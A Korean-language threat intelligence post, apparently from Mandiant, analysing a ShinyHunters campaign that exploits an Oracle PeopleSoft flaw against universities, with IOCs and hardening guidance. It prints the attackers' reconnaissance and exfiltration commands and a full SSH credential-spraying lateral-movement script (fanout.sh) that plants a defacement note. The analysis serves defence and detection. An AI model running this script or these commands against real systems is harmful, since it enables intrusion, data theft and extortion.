콘텐츠로 이동하기
위협 인텔리전스

Oracle PeopleSoft 취약점을 악용해 교육 부문을 겨냥한 ShinyHunters의 공격

2026년 6월 11일
Mandiant

해당 블로그의 원문은 2026년 6월 12일 Google Cloud 블로그(영문)에 게재되었습니다. 


서론

맨디언트(Mandiant)와 구글 위협 인텔리전스 그룹(GTIG)은 Oracle PeopleSoft 애플리케이션 인프라를 표적으로 삼고 활발히 진행 중인 침해 및 협박 캠페인을 포착했으며, 해당 공격의 배후를 UNC6240(ShinyHunters)으로 규명했습니다. 본 활동은 2026년 5월 27일부터 2026년 6월 9일 사이에 관찰되었으며, 이는 Environment Management 구성 요소에 존재하는 심각한 원격 코드 실행 취약점인 CVE-2026-35273 (CVSS 점수 9.8)을 악용한 기법과 일치합니다. 해당 취약점의 악용 양상은 관찰된 Environment Management Hub(PSEMHUB) 엔드포인트에 대한 표적 공격과 직접적으로 맞물려 있습니다. 본 보안 침해 활동은 오라클(Oracle)의 2026년 6월 10일 자 공식 보안 권고안 발표보다 앞서 발생했기 때문에, 공격자들은 해당 취약점을 제로데이(Zero-day) 상태에서 악용한 것으로 분석됩니다.

활발한 시스템 스캔 및 취약점 악용 사실을 인지한 즉시, 구글은 취약한 엔드포인트와 연관성이 높은 IP 주소를 보유한 전 세계 100여 개 이상의 조직에 긴급 침해 조기 경보 알림을 전송하기 시작했습니다. 표적이 된 조직 대다수는 미국에 기반을 두고 있었으며, 그중 68%는 고등 교육(대학 및 전문대) 부문에 속해 있었습니다. 뒤이어 X(구 트위터) 상의 @nahamike01 계정을 통해 공격자가 통제하는 스테이징(Staging) 서버의 오픈 디렉터리들이 노출됨에 따라, GTIG는 해당 위협 행위자의 전반적인 운영 구도를 정밀 분석하고 입체적으로 대응할 수 있었습니다.

공격자의 스테이징 환경에는 합법적인 클라우드 엔드포인트인 것처럼 가장한 커스텀 MeshCentral 에이전트들이 호스팅되어 있었으며, 공격자들은 이를 통해 관리자 명령어 쿼리를 원격 실행하고 내부망 측면 이동(Lateral movement) 및 시스템 변조(Defacement)를 자동화하기 위해 설계된 커스텀 스크립트인 [victim_abbreviation]_fanout.sh를 배포했습니다. 본 캠페인은 뒤이어 2026년 6월 9일 ShinyHunters의 데이터 유출 사이트(DLS) 상에 업로드 및 게시된 실제 피해 조직들의 무단 데이터 탈취 문서 누출 사건과 완벽한 정합성을 보입니다.

Oracle PeopleSoft 인프라를 운영 중인 기업 및 공공 기관들은 자사 시스템을 스스로 보호하기 위해 다음의 긴급 권고 정책들을 즉시 적용할 것을 강력히 권장합니다. 구체적인 사고 예방 해결 및 시스템 하드네스 강화 관련 종합 가이드는 본 블로그 포스트 하단에 상세히 수록되어 있습니다.

위협 세부 정보 및 캠페인 개요

2026년 6월 9일, 공격자 인프라의 오픈 디렉터리들이 노출되어 있음을 폭로하는 공개 위협 보고서들이 소셜 미디어 상에 활발히 게재되었습니다. 이에 GTIG는 해커가 실제 통제하고 가동 중이던 연속적인 5개의 외부 IP 주소들을 정밀 추적하고 긴급 분석했습니다: 142.11.200.186142.11.200.187142.11.200.188142.11.200.189, 및 142.11.200.190. 공격자들은 해당 서버들의 8888번 포트에서 가동 중인 Python SimpleHTTP 서버들을 경유하여 스테이징용 자원, 커스텀 에이전트 도구, 그리고 해커들이 시스템 상에 실행한 세밀한 공격 명령어 히스토리 내역이 가감 없이 포함된 디렉터리 내용 전반을 무방비로 그대로 노출하고 있었습니다.

공격자들이 활용한 스테이징 인프라 내부에는 정식 Microsoft Azure 클라우드 서비스로 영리하게 무단 변장한 사전 구성용 Windows MeshCentral 에이전트 바이너리 파일들이 호스팅되어 있었으며, 해당 파일들의 실명은 meshagent32-azure-ops.exemeshagent64-azure-ops.exe, 및 meshagent64-v2.exe였습니다. MeshCentral은 오픈 소스로 공개되어 널리 활용되는 원격 관리 제어 서버 플랫폼입니다. 이 플랫폼의 에이전트는 Windows, Linux, macOS, FreeBSD 등 다양한 이기종 OS에 설치되어 원격지에서 인프라를 상시 통합 제어하도록 돕는 유틸리티입니다. 수동 분석 결과, 해당 에이전트들은 공격자의 전용 명령 및 제어(C2) 서버인 wss://azurenetfiles.net:443/agent.ashx 주소와 강제 원격 통신 세션을 수립하도록 하드코딩 설계되어 있었습니다. 도메인 주소명인 azurenetfiles.net은 마이크로소프트의 정식 하이브리드 스토리지 서비스인 Azure NetApp Files 엔드포인트를 그대로 정교히 모방하여 방어자의 눈을 속이기 위한 위장 전술의 일환으로 생성되었습니다. 또한, 환경 설정 정보가 부과되지 않은 Linux용 meshagent 바이너리 파일도 스테이징 저장소 내에 함께 보관되어 있는 사실이 발견되었으며, 이는 위협 행위자들이 원격 제어 명령 도구의 배포 및 가동 과정에서 실시간 명령줄을 통해 필요한 구동 파라미터 값들을 동적으로 기입해 가동해 왔음을 강력히 시사합니다.

전 세계 경보 알림 전파 및 대응 캠페인

해당 스테이징 디렉터리의 위험한 개방 사실을 대외적으로 완전 규명하기에 앞서, 구글은 취약한 엔드포인트 장비로의 비인가 외부망 노출을 미연에 방지하기 위해 전 세계 100여 개 이상의 표적 노출 조직들에 긴급 긴급 피해 경보를 선제 전파했습니다. 이 표적 조직들은 압도적으로 고등 교육 산업군에 밀집되어 있었으며, 전체 경보 대상의 무려 68%가 글로벌 전역에 위치한 유수의 주요 대학 및 아카데미 고등 교육 기관들이었습니다.

다수의 조직들이 구글의 신속한 조기 경보를 전달받은 즉시 관련 네트워크 외부망 연결을 적절히 전면 통제 차단하거나 잔존 취약 시스템을 무결하게 사전 패치해 냈으나, 미처 신속한 조치를 취하지 못한 일부 조직들의 경우 실제 시스템 침투 피해를 입고 기밀 데이터를 통째로 유출당했으며, 탈취된 아카이브 자산들은 2026년 6월 9일 ShinyHunters 데이터 유출 사이트(DLS)에 고스란히 무단 폭로되었습니다.

기술 분석 및 해커 명령어 로그 분석

추적된 5개의 모든 스테이징 호스트 상에서 일치하는 형태로 발견된 오픈 .bash_history 시스템 명령어 로그 기록은, 해당 서버들이 어떠한 방식으로 침투 초기 환경을 셋업하고 어떠한 내부 명령들을 실행했는지 적나라하게 밝혀줍니다. 이 기술적 스토리지는 스테이징 인프라의 최초 구축 단계인 2026년 5월 27일 22:14 UTC 시점으로 거슬러 올라갑니다. 위협 행위자들은 원격지 C2 스테이징 인프라의 통합 관리 허브를 정초하기 위해 MeshCentral 원격 관리 서버 (v1.1.59 버전)를 최초 셋업했습니다. 이어서 단 11분 뒤인 22:25 UTC에, 이들은 오피셜 Let's Encrypt SSL 디지털 인증서 발급 프로세스를 기계적으로 자동화하기 위한 목적으로 acme-client npm 오픈 패키지를 신속히 무단 장착하였으며, 이를 도용해 사칭용 위장 도메인 주소인 "azurenetfiles.net"의 트래픽을 정식 HTTPS 보안망 암호화 세션으로 격상해 은폐했습니다. 해커들은 이렇게 안전하게 숨겨진 연결망을 바탕으로 MeshCentral 전용 명령줄 유틸리티인 meshctrl.js 도구를 기동하여 침해당한 희생자 시스템들과 자율 상호 소통을 본격적으로 시작했습니다.

명령어 히스토리 상에서 포착된 위협 행위자들은 침투된 희생자의 내부 폐쇄망 속에서 극도로 계산적이고 은밀한 스캔(Reconnaissance) 및 정보 수집을 자행했습니다. 이들은 디렉터리 마운트 지점들을 정밀 검사하고, 서버 프로세스 스케줄러 핵심 환경 설정 파일인 psappsrv.cfg를 추적해 파싱하였으며, WebLogic 서버 통제 파일인 config.xml 문서들을 상시 열람하는 방식으로 오라클 PeopleSoft 인프라의 아키텍처 토폴로지 구도를 완전 정밀 매핑했습니다. 해당 터미널 세션의 최종 단계 기록은, 스테이징 시스템에서 ShinyHunters 유출 사이트(DLS)의 공용 다크웹 유출 미러 인프라를 호스팅하는 IP 주소 대역인 176.120.22.24 대역으로의 외부 아웃바운드 SSH 커넥션 연결망을 최종 완성 수립하는 단계로 대미를 장식합니다.

노출된 명령어 기록 분석을 통해 스테이징 서버 상에서 위협 행위자들이 자행한 주요 악성 및 관리적 조작 기법들을 시간순으로 상세 정립하여 요약합니다 (일부 세부 타임스탬프 정보는 누락되어 있을 수 있습니다):

1. 스테이징 인프라 구축 및 초기화

  1. 2026년 5월 27일, 22:14 UTC: 원격지 제어 인프라를 완전 장악하기 위해 MeshCentral (v1.1.59)을 설치했으며, 22:25 UTC에는 사칭 전용 도메인인 azurenetfiles.net 트래픽 암호화를 위한 SSL 공인 인증서 정밀 발급을 자동화하고자 "acme-client" 패키지를 서버 내부로 다운로드 후 장착했습니다.

  2. 지정된 C2 암호 통신 주소인 wss://azurenetfiles.net:443/agent.ashx 서버 대역으로 데이터를 상시 백송(Callback)하도록 정교히 사전 코딩 완료된 Windows용 원격 에이전트 바이너리들(meshagent32-azure-ops.exe 등)을 스테이징 다운로드 폴더 내에 적재 배치했습니다.

  3. 2026년 5월 29일, 18:46 UTC: 해커들은 파일 서명 및 바이너리 메타데이터 조작 검증에 사용이 가용한 npm "authenticode" 관련 도구(예: authenticode-signauthenticode)가 시스템 내부 환경에 준비되어 있는지 확인하기 위해 npm list global authenticode 조작 쿼리를 구동해 인프라 사전 검증을 진행했습니다.

2. 내부 침투 대상 시스템 정밀 표적 스캔

  • MeshCentral CLI 연동 도구인 meshctrl.js를 교묘히 기동하여, 외부에서 침해 완료된 다수의 원격 희생자 시스템들을 대상으로 hostname; id 명령어 쿼리들을 전송해 실제 원격 관리자 통제 권한을 정상 확보했는지 여부를 전수 체크했습니다.

  • 프로세스 스케줄러 시스템 파일인 psappsrv.cfg 문서를 깊숙이 검사하고 호스트 기기 실명과 IP 자원 목록들을 일괄 파싱하여 오라클 PeopleSoft 인프라가 배포된 서버 토폴로지 구도를 완전 입체적으로 매핑해 냈습니다.

grep -hE '\''^[[:space:]]*Address=|^[[:space:]]*HostName='\'' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80
  • 침해된 호스트 장비 상의 마운트 활성화 장치와 드라이브 경로들을 입체적으로 파싱해 감시했습니다: mount | grep -E "psoft|ps_config|nfs".

  • 로컬 /etc/hosts 파일 테이블을 열어 내부에 등록 및 하드코딩된 사내 주요 폐쇄망 호스트 및 내부 노드 자원 정보들을 전부 긁어갔습니다: cat /etc/hosts | grep -E "[redacted_victim_string]"

  • 사내에 가동 중인 전체 비즈니스 애플리케이션 백엔드 서버들의 연결 구조를 역추적해 내기 위해 WebLogic XML 환경 설정 자산인 config.xml 통제 문서들을 심층 열람했습니다.

3. 내부망 측면 이동 및 스크립트 전파

  • 내부망 축면 전파를 고속 수행하도록 사전 정밀 설계된 악성 전파 스크립트 파일인 [victim_abbreviation]_fanout.sh를 Heredoc 방식을 활용해 스테이징 서버 내부의 /tmp 디렉터리에 기계적으로 새로 써서 생성해 배치했습니다.

  • MeshCentral의 원격지 일괄 명령어 강제 호출 기능을 악용하여, 침해된 내부 시스템 노드들을 조준해 제작해 둔 위 위협 스크립트를 즉각 일시에 고속 분사 가동했습니다. 

node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh'
  • 제작한 시스템 변조 성공 메시지가 담긴 마커 텍스트 파일인 README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT가 개별 타깃 시스템들의 중요 타깃 디렉터리 경로 내에 성공적으로 완전 저장 안착되었는지 원격 쿼리를 구동해 전파 성공 신호 여부를 재확인했습니다.

4. 대규모 데이터 무단 압축 유출 및 DLS 연동

  • 탈취 타깃으로 정밀 분류해 둔 기밀 데이터 보유 디렉터리들을 유출용으로 초고속 전송 포맷화하기 위해 zstd 초고속 무손실 압축 방식을 사용해 패키징했습니다.

pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst
  • 데이터 유출 작전을 완수하기 위해, 스테이징 서버로부터 다크웹 및 퍼블릭 상의 ShinyHunters 공식 유출 웹사이트 미러를 가동 중인 외부의 최종 목적지 IP 주소 대역인 176.120.22.24 대역으로 외부 아웃바운드 SSH 세션을 체결해 대용량 패키지 전송을 끝으로 모든 침투 조작 시나리오를 종료했습니다.
https://storage.googleapis.com/gweb-cloudblog-publish/images/peoplesoft-shinyhunters.max-1700x1700.png

그림 1: 2026년 6월 9일 ShinyHunters DLS 상에 새로운 PeopleSoft 피해 조직의 데이터 유출 포스트가 추가 게재된 화면

측면 이동 및 위협 스크립트 전파 기법 분석

공격자의 터미널 로그 내역에서 밝혀진 바와 같이, 위협 행위자들은 타깃 시스템의 /tmp 디렉터리에 직접 [victim_abbreviation]_fanout.sh라는 영리하게 작성된 자동화 전파 스크립트를 심어 기동했습니다. 이 자율 구동 스크립트는 로컬의 /etc/hosts 파일 내에서 특정 명칭 템플릿(csprd 등)과 매칭되는 사내의 모든 폐쇄 내부망 호스트 도메인 자원 정보들을 자동으로 스크랩한 뒤, 긁어모은 내부 주소들을 대상으로 대규모 SSH 자격 증명 무차별 대입 공격(Credential spraying)을 초고속 자동 실행하도록 설계되었습니다. 스크립트 내부에는 사내 인프라 관리자 및 시스템 구동용으로 가장 흔하게 도용되는 기본 관리자 계정 ID 명칭들과 패스워드 비밀번호 템플릿 값들이 변수 문자열 배열 형태로 촘촘히 하드코딩 적재되어 있었습니다.

임의의 호스트 노드를 상대로 SSH 세션 침투 매칭에 성공해 연결망이 수립되는 순간, 본 스크립트는 WebLogic 핵심 폴더 및 Process Scheduler 서비스 디렉터리 경로 하단으로 시스템 변조 및 금전 요구 협박 메시지가 담긴 마커 텍스트 파일인 README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT를 기계적으로 무단 복사해 정착시켰습니다. 이 신속한 원격 전파 및 자원 배치 시나리오는 2026년 6월 9일 ShinyHunters 유출 웹사이트 상에 폭로된 전 세계 기업 및 대학 기밀 아카이브 유출 대참사 사건의 타임라인과 완벽한 시간적 정합성을 갖춥니다.

마스킹 처리된 자동 전파 스크립트([victim_abbreviation]_fanout.sh)의 원시 코드는 다음과 같습니다.

set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin
# hosts from /etc/hosts — internal PS nodes only
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
echo "HOSTS=$(echo $HOSTS | wc -w)"
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"
OK=0; FAIL=0; SKIP=0
for h in $HOSTS; do
  echo "=== $h ==="
  copied=0
  for u in $USERS; do
    for p in $PWDS; do
      sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=no $u@$h "hostname" >/dev/null 2>&1 && {
        for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
          sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && echo "  OK $dest ($u)" && OK=$((OK+1)) && copied=1
        done
        break 2
      }
    done
  done
  if [ $copied -eq 0 ]; then
    # try key-based
    ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=yes $USER@$h "hostname" >/dev/null 2>&1 && copied=1 || true
    if [ $copied -eq 0 ]; then echo "  FAIL ssh"; FAIL=$((FAIL+1)); fi
  fi
done
# local paths on this host
for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
  if [ -d "$dest" ]; then cp -f "$SRC" "$dest/$NAME" && chmod 644 "$dest/$NAME" && echo "LOCAL OK $dest"; fi
done
echo SUMMARY ok=$OK fail=$FAIL
find $BASE -name "$NAME" -type f 2>/dev/null

보안 해결 및 인프라 하드닝 실무 조치

유사 기법 및 취약점을 파고드는 일련의 심각한 침투 공격 전술에 빈틈없이 대응하기 위해, Oracle PeopleSoft 시스템을 가동 중인 전 세계의 기업 및 공공 부문 조직들은 다음의 입체적인 상시 보안 조치들을 즉각 실무 인프라에 적용해야 합니다.

네트워크 차단 및 WAF 보호 규칙 정립

  • 원격 엔드포인트 수동 전면 차단: 만약 EMHub 시스템 가동을 당장 완전 비활성화할 수 없는 피치 못할 상황이라면, 보안망 및 네트워크 인프라 게이트웨이 경계선 상에서 외부 퍼블릭 망으로부터 유입되는 민감한 통로인 /PSEMHUB/* (특히 핵심 허브 경로인 /PSEMHUB/hub) 및 /PSIGW/HttpListeningConnector 엔드포인트 URL로의 모든 인입 접속 시도를 즉각 전면 거부 차단하십시오. 단순히 웹 애플리케이션 방화벽(WAF)의 본문 바디 검사(Body-inspection) 필터링 규칙에만 전적으로 의지하는 대처 방식은 극히 지능적인 해커들의 보안 우회 기술을 통해 쉽게 무력화되므로 결코 충분하지 않습니다.

  • 업무 무중단성 보장: 본 조치를 부과하더라도 기업 임직원 및 일반 최종 사용자들이 통상 사용하는 일반적인 PeopleSoft 인터넷 아키텍처(PIA) 웹 브라우저 사용자 세션 구동에는 어떠한 장애나 비즈니스 영향(Non-breaking)도 초래하지 않습니다. 왜냐하면 Environment Management Hub(EMHub) 및 Integration Broker Listening Connector 모듈들은 순수히 사내 서버 대 서버 간의 백엔드 통신 제어를 돕기 위한 내부 관리 목적 장치일 뿐, 전면 PIA 브라우저 세션 기동에 관여하는 필수 유틸리티가 아니기 때문입니다.

로그 감사 및 엔드포인트 실시간 모니터링

  • 웹 액세스 로그 전수 감사: 기업 외부망이나 보안 수준이 검증되지 않은 의심스러운 소스 IP 대역으로부터 PIA WebLogic의 /PSEMHUB/hub 및 /PSIGW/HttpListeningConnector 엔드포인트 경로를 타깃으로 인입된 비정상적인 HTTP POST 데이터 호출 기록들이 누적되어 있는지 백엔드 로그를 상시 분석 감사하십시오.

  • SSRF 서버측 요청 변조 정밀 탐지: /PSIGW/HttpListeningConnector를 표적으로 유입된 데이터 트래픽의 헤더 파라미터 값들 내부에 로컬 루프백 전용 주소 문자열(예: 127.0.0.1localhost::1 등)이나 사내 핵심 내부 사설 IP 대역이 무단 매핑 및 변조되어 흐르고 있는지 추적하십시오. 이는 공격자가 외부 보안 제어망을 유유히 우회해 내부 시스템을 교란하기 위해 가장 자주 도용하는 SSRF(Server-Side Request Forgery) 침투 전술의 독특한 행동 양상입니다.

네트워크 텔레메트리

  • 아웃바운드 445 포트 집중 감시: 사내 PeopleSoft 서버 시스템으로부터 검증되지 않은 위험한 외부 인터넷망 및 비인가 외부 대역으로 유출되는 비정상적인 SMB 아웃바운드 트래픽(TCP 포트 445)의 발생 기록이 누적되고 있는지 방화벽 세션 및 NetFlow 데이터를 상시 감시하십시오. 공격자는 이 취약점 악용 프로세스의 하위 동작으로써 Windows 머신 어카운트의 NetNTLM 해시 자격 증명 정보를 무단 가로채기 위해 외부망 아웃바운드 SMB 연결 수립을 강제 시도할 수 있습니다.

호스트 레벨 포렌식 및 웹 티어 파일 시스템 무결성 전수 검사

PeopleSoft 호스트 서버 장비 내부의 웹 서비스 파일 디렉터리를 대상으로, 백엔드 전반의 침해 흔적(IOC)을 파악하기 위한 정밀 포렌식 전수 감사를 긴급 가동하십시오 

 
 

 .

  • 웹셸 백도어 파일 탐지: WebLogic 웹 애플리케이션의 핵심 프로덕션 경로인 <PS_CFG_HOME>/webserv/<domain>/applications/peoplesoft/PSEMHUB.war/ 디렉터리 및 그 하위 폴더들을 대상으로, 제품 정식 배포 시 기본 탑재되지 않는 모든 기묘하고 비인가된 *.jsp 웹셸 흔적 파일이 무단 생성 및 상주하고 있는지 전수 일치 검사를 수행하십시오 

     
     

     .

  • 비인가 스테이징 무단 적재 감지: 스테이징 임시 저장 경로인 .../PSEMHUB.war/envmetadata/transactions/ 폴더 내부에 인가되지 않은 미지의 악성 폴더, 정체불명의 바이너리 실행 도구, 혹은 은밀히 압축된 데이터 누출용 아카이브 파일 등이 무단 보관되어 있는지 집중 스캔하십시오.

  • 의심스러운 신규 폴더 생성 체크: PSEMHUB 디렉터리 경로 하단에 기본 사양에 명시되지 않는 이름의 임의 생성된 폴더들(예: logspersistantstoragescratchpad 등)의 유무를 확인하십시오 

     
     

     .

  • XMLDecoder 백도어 지속성 차단: <docroot>/envmetadata/data/environment/ 폴더 내에 최근 새롭게 쓰였거나 날짜가 임의 변조 변경된 .xml 파일들의 무결성을 확인하십시오. 해커들은 시스템 및 서비스 어플라이언스가 차후 재부팅 및 서비스 재실행되는 시점에 XMLDecoder 모듈의 내장 파싱 특성을 역이용하여 백엔드에서 원격 시스템 코드가 자동으로 백그라운드 구동되도록 XML 파일 내에 악성 구동 문자열을 무단 주입해 두는 교묘한 지속성(Persistence) 기술을 악용할 수 있습니다.

구글은 오라클 공식 긴급 보안 권고안 내용과 동일하게, 상기 언급한 모든 인프라 취약점 예방 조치를 비즈니스의 사활이 걸린 최우선 리스크 축소 과제로 엄격히 관리할 것을 강력히 권고합니다. 본 취약점은 해커가 복잡한 인증 절차를 거치지 않고도 전 세계 원격지에서 직접 서버를 조준해 관리자 코드를 완전 실행할 수 있는 무서운 파괴력을 지닌 만큼, 관련 시스템 가동 기업 및 기관들은 상시 오라클의 정식 최신 활성 지원 버전을 원활히 가동하는 한편 모든 치명적인 보안 패치(Critical Patch Updates), 보안 얼럿 알림(Security Alerts)을 미루지 말고 즉시 실무에 패치 적용 완료해야 합니다. 보다 상세한 기술 패치 정립 방안은 오피셜 Oracle Security Alert Advisory - CVE-2026-35273 페이지를 참조해 주시기 바랍니다.

침해 지표 (IOCs)

글로벌 보안 커뮤니티 전반의 위협 헌팅 활동을 적극적으로 지원하고 유사한 위협 징후의 조기 식별을 돕기 위해, 구글은 가입한 정식 등록 사용자들을 대상으로 가용한 GTI 컬렉션(GTI collection) 웹 페이지 상에 관련 주요 침해 지표 정보를 투명하게 전면 개방하여 공유해 두고 있습니다.

공격자 스테이징 인프라 및 C2 네트워크 지표

  • 142.11.200.186

  • 142.11.200.187

  • 142.11.200.188

  • 142.11.200.189

  • 142.11.200.190

  • azurenetfiles.net

스테이징용 악성 페이로드 및 해커 파일 정보

파일 경로 및 파일명

지표 유형

상세 설명

SHA-256 해시값

.bash_history

File Hash

스테이징 서버 내 해커 실행 명령 히스토리

2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35

meshagent64-azure-ops.exe

File Hash

사전에 미리 구성 완료된 Windows 에이전트

 

f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc

meshagent64-v2.exe

File Hash

사전에 미리 구성 완료된 Windows 에이전트

d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f

meshagent32-azure-ops.exe

File Hash

사전에 미리 구성 완료된 Windows 에이전트

c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f

meshagent

File Hash

아직 구성값이 기입되지 않은 리눅스용 에이전트

68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309

README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT

Filename

공격 성공 조롱 및 금전 요구 협박 마커 텍스트 파일

N/A

[victim_abbreviation]_fanout.sh

Filename

자율 구동 셸 스크립트

N/A

Google Security Operations (SecOps)

구글 SecOps를 가동 중인 엔터프라이즈 고객사들은 시스템 내부에서 탐지망을 정교히 가동할 수 있도록 순차 배포가 예정된 전용 탐지 규칙(Rules) 세트들을 즉각 활성 활용하실 수 있습니다. 완벽한 배포 프로세스가 완료되는 즉시, 본 탐지 룰셋들은 Mandiant Frontline Threats 룰 팩 항목 하위에 통합되어 즉시 인프라 감시 기능으로 제공됩니다.

  • Oracle PeopleSoft 시스템 아키텍처 정밀 점검 감사 룰 (Oracle PeopleSoft Configuration Inspection)

  • Oracle PeopleSoft PSEMHUB 경로 하위 비인가 JSP 웹셸 의심 파일 생성 감지 룰 (Oracle PeopleSoft Suspicious JSP File Write to PSEMHUB)

  • Sshpass 방식을 악용한 비정상적인 원격 셸 스크립트 전파 감지 룰 (Sshpass Interactive File Deployment)

  • Zstd 압축 방식을 악용한 비정상 대용량 파일 아카이빙 압축 행위 탐지 룰 (Data Archiving or Compression via Zstd Utility)

  • Meshctrl을 악용한 비정상 MeshCentral 내부 명령 제어 시도 탐지 룰 (MeshCentral Command Execution via Meshctrl)

게시 위치